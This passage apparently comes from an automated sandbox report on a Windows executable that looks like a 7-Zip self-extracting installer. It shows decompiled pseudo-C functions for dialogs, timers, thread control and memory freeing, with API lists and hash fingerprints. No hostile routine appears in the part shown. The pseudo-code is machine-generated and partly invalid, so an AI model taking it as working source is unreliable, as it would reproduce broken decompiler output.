                                          0x0040b822
                                          0x0040b830
                                          0x0040b835
                                          0x0040b851
                                          0x0040b854
                                          0x00000000
                                          0x0040b85a
                                          0x0040b862
                                          0x0040b875
                                          0x0040b875
                                          0x0040b837
                                          0x0040b837
                                          0x0040b846
                                          0x0040b84a
                                          0x0040b84b
                                          0x0040b84f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b84f
                                          0x0040b97d
                                          0x0040b97d
                                          0x0040b97d
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??2@??3@memset
                                          • String ID: gj
                                          • API String ID: 1510051167-4203073231
                                          • Opcode ID: a71d862290bd4659f56f322b8ebfcce5da4a9344bafed646d4939b58d2e31cdb
                                          • Instruction ID: 5ab1223f956dad006c461569b39dc5db1a7a3ac289c35279b9943f5a0f586916
                                          • Opcode Fuzzy Hash: a71d862290bd4659f56f322b8ebfcce5da4a9344bafed646d4939b58d2e31cdb
                                          • Instruction Fuzzy Hash: DB419BB25043009FC324EF25C88095BB7E5FF99718F148E2EE4DA97652E734E9498B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407489, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00407489() {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t41;
				intOrPtr _t42;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr* _t69;
				void* _t71;
				void* _t72;

				_push(_t42);
				_push(_t42);
				_v12 = _t42;
				if(( *0x422774 & 0x00000080) == 0) {
					L9:
					_t23 = 0;
					L10:
					return _t23;
				}
				_t41 = 0;
				_t71 =  *0x422704 - _t41; // 0x0
				if(_t71 > 0) {
					goto L9;
				}
				_t72 = E00401303(0x4227b8, _t71);
				if(_t72 == 0) {
					goto L9;
				}
				_t25 = E0040115F(0x4227b8);
				_t59 = 4;
				_t63 = _t25;
				_t60 = _t25 * _t59 >> 0x20;
				_t26 = _t25 * _t59;
				_push( ~(0 | _t72 > 0x00000000) | _t26);
				L0041C16C();
				_t68 = 0;
				_v8 = _t26;
				if(_t63 == 0) {
					L8:
					_push(_v8);
					L0041C160();
					goto L9;
				} else {
					goto L4;
				}
				do {
					L4:
					_t27 = E0040732B(_t68);
					if(_t27 != 0) {
						_t27 = _v8;
						 *((intOrPtr*)(_t27 + _t41 * 4)) = _t68;
						_t41 = _t41 + 1;
					}
					_t68 = _t68 + 1;
				} while (_t68 < _t63);
				if(_t41 != 0) {
					_push(0x48);
					L0041C16C();
					__eflags = _t27;
					if(_t27 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = E004025B4(_t27);
					}
					__eflags = _t69;
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 4))(_t69);
					}
					_t64 = _v12;
					E00407370(_t64, _t60);
					_t17 = _t64 + 4; // 0x700062
					E004023C3(_t69,  *_t17);
					_t30 =  *0x4227c0; // 0x566888
					_t31 =  *((intOrPtr*)( *_t30 + 0x1c))(_t30, _v8, _t41, 0, _t69);
					_push(_v8);
					__eflags = _t31;
					if(_t31 == 0) {
						L0041C160();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						_t23 = 1;
						goto L10;
					} else {
						L0041C160();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						goto L9;
					}
				}
				goto L8;
			}






















                                          0x0040748c
                                          0x0040748d
                                          0x00407498
                                          0x0040749b
                                          0x00407502
                                          0x00407502
                                          0x00407504
                                          0x00407508
                                          0x00407508
                                          0x0040749d
                                          0x0040749f
                                          0x004074a5
                                          0x00000000
                                          0x00000000
                                          0x004074b3
                                          0x004074b5
                                          0x00000000
                                          0x00000000
                                          0x004074b9
                                          0x004074c2
                                          0x004074c3
                                          0x004074c5
                                          0x004074c5
                                          0x004074ce
                                          0x004074cf
                                          0x004074d4
                                          0x004074d7
                                          0x004074dc
                                          0x004074f9
                                          0x004074f9
                                          0x004074fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004074de
                                          0x004074de
                                          0x004074e0
                                          0x004074e7
                                          0x004074e9
                                          0x004074ec
                                          0x004074ef
                                          0x004074ef
                                          0x004074f0
                                          0x004074f1
                                          0x004074f7
                                          0x00407509
                                          0x0040750b
                                          0x00407511
                                          0x00407513
                                          0x00407520
                                          0x00407520
                                          0x00407515
                                          0x0040751c
                                          0x0040751c
                                          0x00407522
                                          0x00407524
                                          0x00407529
                                          0x00407529
                                          0x0040752c
                                          0x00407531
                                          0x00407536
                                          0x0040753b
                                          0x00407540
                                          0x0040754f
                                          0x00407552
                                          0x00407555
                                          0x00407557
                                          0x0040756b
                                          0x00407571
                                          0x00407573
                                          0x00407578
                                          0x00407578
                                          0x0040757b
                                          0x00000000
                                          0x00407559
                                          0x00407559
                                          0x0040755f
                                          0x00407561
                                          0x00407566
                                          0x00407566
                                          0x00000000
                                          0x00407561
                                          0x00407557
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID: XhV
                                          • API String ID: 4113381792-2999104372
                                          • Opcode ID: 7b21205f6b6f9067870c64fb6e9b261bc8abc4532f3ec8503cb1f5211d0e8cba
                                          • Instruction ID: 58b793ad712c308d4ddd91de517e6b93f9a326b0b37e95d3d2077ce1cdaad68c
                                          • Opcode Fuzzy Hash: 7b21205f6b6f9067870c64fb6e9b261bc8abc4532f3ec8503cb1f5211d0e8cba
                                          • Instruction Fuzzy Hash: 51312871E095217BCB256F648C459AFB7649F41B14B10007FF9427B7D2CB78AC02869E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401AA4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00401AA4() {
				struct HWND__* _v8;
				short _v264;
				short _v2312;
				WCHAR* _t15;
				struct HWND__* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				WCHAR* _t35;
				WCHAR* _t36;
				WCHAR* _t37;
				void* _t39;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t15 =  *0x422714; // 0x0
				_t45 = _t44 - 0x904;
				_t32 = 0;
				_t43 = _t34;
				if(_t15 == 0) {
					_t35 = 0x27;
					wsprintfW( &_v2312, E00403CE0(_t35),  *_t43,  *((intOrPtr*)(_t43 + 0xc)));
					_t46 = _t45 + 0x10;
					_v8 = 0;
					if( *((intOrPtr*)(_t43 + 0x10)) <= 0) {
						L8:
						if(";!@Install@!UTF-8!" == 0x3b) {
							_t36 =  &_v2312;
							L11:
							E0040959E(_t36, _t39);
							L12:
							E00405A7A();
							ExitProcess(0xa);
						}
						_push(_t32);
						_t37 = 3;
						MessageBoxW(_t32,  &_v2312, E00403CE0(_t37), ??);
						goto L12;
					}
					_t33 = _t43 + 0x14;
					do {
						wsprintfW( &_v264, L"\t0x%p\n",  *_t33);
						_t46 = _t46 + 0xc;
						lstrcatW( &_v2312,  &_v264);
						_v8 = _v8 + 1;
						_t33 = _t33 + 4;
					} while (_v8 <  *((intOrPtr*)(_t43 + 0x10)));
					_t32 = 0;
					goto L8;
				}
				_t48 =  *0x422716 - _t32; // 0x0
				if(_t48 != 0) {
					 *0x422714 = _t15;
				}
				_t36 = E00403CE0(_t15);
				goto L11;
			}



















                                          0x00401aa7
                                          0x00401aac
                                          0x00401ab4
                                          0x00401ab7
                                          0x00401abb
                                          0x00401add
                                          0x00401af6
                                          0x00401af8
                                          0x00401afb
                                          0x00401b01
                                          0x00401b3d
                                          0x00401b44
                                          0x00401b60
                                          0x00401b66
                                          0x00401b66
                                          0x00401b6b
                                          0x00401b6b
                                          0x00401b72
                                          0x00401b72
                                          0x00401b46
                                          0x00401b49
                                          0x00401b58
                                          0x00000000
                                          0x00401b58
                                          0x00401b03
                                          0x00401b06
                                          0x00401b14
                                          0x00401b16
                                          0x00401b27
                                          0x00401b2d
                                          0x00401b33
                                          0x00401b36
                                          0x00401b3b
                                          0x00000000
                                          0x00401b3b
                                          0x00401abd
                                          0x00401ac4
                                          0x00401ac8
                                          0x00401ac8
                                          0x00401ad4
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: wsprintf$ExitMessageProcesslstrcat
                                          • String ID: 0x%p
                                          • API String ID: 1920160435-1745605757
                                          • Opcode ID: d86e4351e7d9697730524a81419c8ec4332a5d487605cddaa6eef0c5bbd365f0
                                          • Instruction ID: bdd98ded1a4888b9718e7119b40d0133e4242b4b1d5a6e7b56f428a96039426d
                                          • Opcode Fuzzy Hash: d86e4351e7d9697730524a81419c8ec4332a5d487605cddaa6eef0c5bbd365f0
                                          • Instruction Fuzzy Hash: FA2157B1A04218BFDB20EFB4DD85A9A77BCEF44344F50047AA501F3191DB78AA448B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408A8A, Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00408A8A(void* __ecx) {
				int _t10;
				signed int _t18;
				void* _t21;
				void* _t25;
				void* _t27;
				intOrPtr _t30;
				signed int _t31;
				void* _t35;

				_t27 = __ecx;
				_t30 =  *0x4228e0; // 0x0
				if(_t30 != 0) {
					_t10 = EndDialog( *(__ecx + 4), 0);
				}
				_t31 =  *0x4228d4; // 0x0
				if(_t31 != 0) {
					KillTimer( *(_t27 + 4), 1);
					_t32 =  *0x42245c & 0x00000100;
					if(( *0x42245c & 0x00000100) == 0 || E00408A46(_t27, _t25, _t32) != 0) {
						_push(0);
						_push( *(_t27 + 4));
						L13:
						return EndDialog();
					}
					_t18 =  *0x4228d4; // 0x0
					_t10 = SetTimer( *(_t27 + 4), 1, _t18 * 0xa, 0);
				}
				_t35 =  *0x422770 - 1; // 0x2
				if(_t35 != 0) {
					_t21 =  *0x422720; // 0x0
					if(_t21 != 0) {
						SuspendThread(_t21);
						_t37 =  *0x42245c & 0x00000100;
						if(( *0x42245c & 0x00000100) == 0 || E00408A46(_t27, _t25, _t37) != 0) {
							 *0x4228cc = 1;
							TerminateThread(_t21, 0x16);
							_push(0);
							_push( *(_t27 + 4));
							goto L13;
						} else {
							return ResumeThread(_t21);
						}
					}
				}
				return _t10;
			}











                                          0x00408a96
                                          0x00408a98
                                          0x00408a9e
                                          0x00408aa4
                                          0x00408aa4
                                          0x00408aa9
                                          0x00408aaf
                                          0x00408ab5
                                          0x00408abb
                                          0x00408ac5
                                          0x00408b1f
                                          0x00408b20
                                          0x00408b39
                                          0x00000000
                                          0x00408b39
                                          0x00408ad2
                                          0x00408ae0
                                          0x00408ae0
                                          0x00408ae6
                                          0x00408aec
                                          0x00408aee
                                          0x00408af6
                                          0x00408af9
                                          0x00408aff
                                          0x00408b09
                                          0x00408b28
                                          0x00408b2e
                                          0x00408b34
                                          0x00408b36
                                          0x00000000
                                          0x00408b16
                                          0x00000000
                                          0x00408b17
                                          0x00408b09
                                          0x00408af6
                                          0x00408b3f

                                          APIs
                                          • EndDialog.USER32(?,00000000), ref: 00408AA4
                                          • KillTimer.USER32(?,00000001), ref: 00408AB5
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408AE0
                                          • SuspendThread.KERNEL32(00000000), ref: 00408AF9
                                          • ResumeThread.KERNEL32(00000000), ref: 00408B17
                                          • EndDialog.USER32(?,00000000), ref: 00408B39
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: DialogThreadTimer$KillResumeSuspend
                                          • String ID:
                                          • API String ID: 4151135813-0
                                          • Opcode ID: 885b3203f5fafc8ea029e998e3dfa88956fb95a6329574f64dc11b18cd69f5ab
                                          • Instruction ID: e0febfc1c518c38718134784bfd0cfd8211ff2635dc020f4aeb641ff724bccfa
                                          • Opcode Fuzzy Hash: 885b3203f5fafc8ea029e998e3dfa88956fb95a6329574f64dc11b18cd69f5ab
                                          • Instruction Fuzzy Hash: 98116DB0700204AFD7256F21EF85A6737ADEB60785B40403EF696A15A0CFB8AC02DF1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418480, Relevance: 10.5, APIs: 7, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00418480(intOrPtr* __ecx) {
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t28;

				 *__ecx = 0;
				_push( *((intOrPtr*)(__ecx + 8)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t22 = __ecx + 0x3c;
				_pop(_t27);
				_t28 = _t22;
				_t20 =  *_t28;
				if(_t20 != 0) {
					_push(_t20);
					L0041C160();
					 *_t28 = 0;
				}
				 *((intOrPtr*)(_t28 + 4)) = 0;
				return _t20;
			}






                                          0x00418486
                                          0x00418488
                                          0x0041848b
                                          0x00418490
                                          0x00418493
                                          0x00418496
                                          0x00418499
                                          0x0041849c
                                          0x0041849f
                                          0x004184a4
                                          0x004184a7
                                          0x004184aa
                                          0x004184af
                                          0x004184b2
                                          0x004184b5
                                          0x004184ba
                                          0x004184bd
                                          0x004184c0
                                          0x004184c5
                                          0x004184c8
                                          0x004184cb
                                          0x004184d0
                                          0x004184d3
                                          0x004184d6
                                          0x004184de
                                          0x004184e2
                                          0x004184e5
                                          0x0040b6c1
                                          0x0040b6c3
                                          0x0040b6c7
                                          0x0040b6c9
                                          0x0040b6ca
                                          0x0040b6d2
                                          0x0040b6d2
                                          0x0040b6d8
                                          0x0040b6e0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 01efdebc63e54f2fb10f3b22901f6864d42087f6f1f3c1b170dfb205c1aa1f98
                                          • Instruction ID: f1de91cbc462ee97d673e7db93c01427bec84cd42ac756398f0c521e5fe4e4e7
                                          • Opcode Fuzzy Hash: 01efdebc63e54f2fb10f3b22901f6864d42087f6f1f3c1b170dfb205c1aa1f98
                                          • Instruction Fuzzy Hash: DE01C471480B54ABC2316F17CD85847FEF1FF94B04340591FA08602932C7B5B891DF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405CA1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00405CA1(void* __edx, void* __edi, void* __eflags) {
				char _v16;
				char _v100;
				short _v356;
				void* _t28;
				WCHAR* _t49;
				signed int _t51;
				void* _t55;
				void* _t57;

				 *0x42245c = 8;
				E004075CF( &_v100, __edx, __eflags);
				_v100 = 0x41eaa0;
				E00414803( &_v16, E00403CE0(1));
				_t51 = 0;
				_t55 =  *0x424c60 - _t51; // 0x9
				if(_t55 > 0) {
					_t49 = L", ";
					do {
						if(_t51 != 0) {
							E00414922( &_v16, _t49);
						}
						E00414A08( &_v16,  *((intOrPtr*)( *((intOrPtr*)(0x424b20 + _t51 * 4)) + 0x10)));
						_t51 = _t51 + 1;
						_t57 = _t51 -  *0x424c60; // 0x9
					} while (_t57 < 0);
					if(_t51 != 0) {
						E00414922( &_v16, _t49);
					}
				}
				E00414922( &_v16, L"Volumes");
				wsprintfW( &_v356, L" \n\t%X - %03X - %03X - %03X - %03X", 1, 0x5ff, 0x1f, 0x3fff, 7);
				E00414922( &_v16,  &_v356);
				E00414922( &_v16, 0x41ebe4);
				_t28 = E00407941( &_v100, 0x11,  *0x422738, _v16, 0);
				_push(_v16);
				L0041C160();
				return E00407630(_t28,  &_v100);
			}











                                          0x00405cae
                                          0x00405cb8
                                          0x00405cc0
                                          0x00405cd0
                                          0x00405cd5
                                          0x00405cd7
                                          0x00405cdd
                                          0x00405ce0
                                          0x00405ce5
                                          0x00405ce7
                                          0x00405ced
                                          0x00405ced
                                          0x00405cff
                                          0x00405d04
                                          0x00405d05
                                          0x00405d05
                                          0x00405d0f
                                          0x00405d15
                                          0x00405d15
                                          0x00405d1a
                                          0x00405d23
                                          0x00405d44
                                          0x00405d57
                                          0x00405d64
                                          0x00405d79
                                          0x00405d7e
                                          0x00405d81
                                          0x00405d91

                                          APIs
                                            • Part of subcall function 004075CF: KiUserCallbackDispatcher.NTDLL ref: 00407611
                                            • Part of subcall function 004075CF: GetSystemMetrics.USER32 ref: 0040761F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • wsprintfW.USER32 ref: 00405D44
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405D81
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??3@CallbackDispatcherMetricsSystemUserwsprintf
                                          • String ID: %X - %03X - %03X - %03X - %03X$<A$Volumes
                                          • API String ID: 2991351368-3399665096
                                          • Opcode ID: 6355d9d1674f6326a2081362d6ecd1f5afe3a0ffddf576bb82739cecf16ff926
                                          • Instruction ID: ad8d23a7da3522afc9b8f86878820b42e07b12c4948eacb7cadc135188fea655
                                          • Opcode Fuzzy Hash: 6355d9d1674f6326a2081362d6ecd1f5afe3a0ffddf576bb82739cecf16ff926
                                          • Instruction Fuzzy Hash: 0A21A171D442186ACB14FB96EC46EDEB334FF80704F50417AB502760D1DB782A45CB8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409190, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00409190(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				struct _SHFILEINFOW _v712;
				short _v1236;
				void* _t32;
				void* _t40;
				void* _t44;

				_t40 = __edx;
				_t44 = __ecx;
				E00407925(__ecx, 0x4b6,  &_v20);
				 *((intOrPtr*)(_t44 + 0x58)) = _v8 - _v16 + 2;
				E004079B7(_t44, 0x4b6, 1);
				E004079B7(_t44, 0x4b6, 1);
				_v712.hIcon = _v712.hIcon & 0x00000000;
				memset( &(_v712.iIcon), 0, 0x2b0);
				GetSystemDirectoryW( &_v1236, 0x104);
				SHGetFileInfoW( &_v1236, 0,  &_v712, 0x2b4, 0x103);
				 *(_t44 + 0x50) = _v712.hIcon;
				 *((intOrPtr*)(_t44 + 0x54)) = SetWindowLongW(GetDlgItem( *(_t44 + 4), 0x4b7), 0xfffffffc, E0040808C);
				_t32 = E00408E57(_t40);
				E004085BD();
				return _t32;
			}











                                          0x00409190
                                          0x004091a5
                                          0x004091a7
                                          0x004091ba
                                          0x004091bd
                                          0x004091c8
                                          0x004091cd
                                          0x004091e2
                                          0x004091f6
                                          0x00409216
                                          0x00409226
                                          0x0040923f
                                          0x00409242
                                          0x0040924b
                                          0x00409255

                                          APIs
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                          • memset.MSVCRT ref: 004091E2
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091F6
                                          • SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00409216
                                          • GetDlgItem.USER32 ref: 00409229
                                          • SetWindowLongW.USER32 ref: 00409237
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                            • Part of subcall function 00408E57: LoadIconW.USER32(00000000), ref: 00408E84
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E98
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E9D
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                            • Part of subcall function 00408E57: LoadImageW.USER32 ref: 00408EA9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EEF
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EF9
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F14
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F22
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F30
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F4B
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F58
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085D3
                                            • Part of subcall function 004085BD: SetFocus.USER32(00000000,?,?,?,?,00408678,?), ref: 004085D6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085E6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085FB
                                            • Part of subcall function 004085BD: SendMessageW.USER32(00000000,000000B1,0000002C,0000002C), ref: 00408605
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
                                          • String ID:
                                          • API String ID: 358862773-0
                                          • Opcode ID: 81ec041cacca2d59917e046878064d1098f3cedd17596b8ea65ee1b3a9ebd4b2
                                          • Instruction ID: 2561db17b14fe2180de4adf028dc837e5a6c8d79ccad7adf452e374fc0286804
                                          • Opcode Fuzzy Hash: 81ec041cacca2d59917e046878064d1098f3cedd17596b8ea65ee1b3a9ebd4b2
                                          • Instruction Fuzzy Hash: 941186B1E40314A7DB20ABA5DD49F9E77BCAB84B04F00456FB651E32C1DBB8D9448B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004169D1, Relevance: 7.5, APIs: 5, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E004169D1(intOrPtr* __ecx) {
				void* _t5;

				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L0041C160();
				_push( *__ecx);
				L0041C160();
				return _t5;
			}




                                          0x004169d4
                                          0x004169d7
                                          0x004169dc
                                          0x004169df
                                          0x004169e4
                                          0x004169e7
                                          0x004169ec
                                          0x004169ef
                                          0x004169f4
                                          0x004169f6
                                          0x004169ff

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 2f1dc90039608aa64530f4edc2d67106cfe286a53b84a5a9d782c4090705416f
                                          • Instruction ID: f2f6c36ad054111763b42ac461140cf9b87e5ea67fb04b9142b7eb6dfeeb418c
                                          • Opcode Fuzzy Hash: 2f1dc90039608aa64530f4edc2d67106cfe286a53b84a5a9d782c4090705416f
                                          • Instruction Fuzzy Hash: 15D0C7395C0534BACA223B16EC439C77AB1AF00B18305056FB08611433DAD67CE19E4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408345, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00408345(void* __ecx) {
				char _v16;
				short _v528;
				void* _t16;
				WCHAR* _t26;
				void* _t28;

				_t28 = __ecx;
				E00414839( &_v16, __ecx + 0x3c);
				if( *((intOrPtr*)(__ecx + 0x48)) > 0) {
					_t26 = 0x1d;
					wsprintfW( &_v528, L" (%d%s)",  *((intOrPtr*)(__ecx + 0x48)), E00403CE0(_t26));
					E00414922( &_v16,  &_v528);
				}
				_t16 = E0040790B(GetDlgItem( *(_t28 + 4),  *(_t28 + 0x4c)), _v16);
				_push(_v16);
				L0041C160();
				return _t16;
			}








                                          0x0040834f
                                          0x00408358
                                          0x00408361
                                          0x00408365
                                          0x0040837b
                                          0x0040838e
                                          0x0040838e
                                          0x004083a6
                                          0x004083ab
                                          0x004083ae
                                          0x004083b6

                                          APIs
                                            • Part of subcall function 00414839: memcpy.MSVCRT ref: 00414855
                                          • wsprintfW.USER32 ref: 0040837B
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          • GetDlgItem.USER32 ref: 0040839D
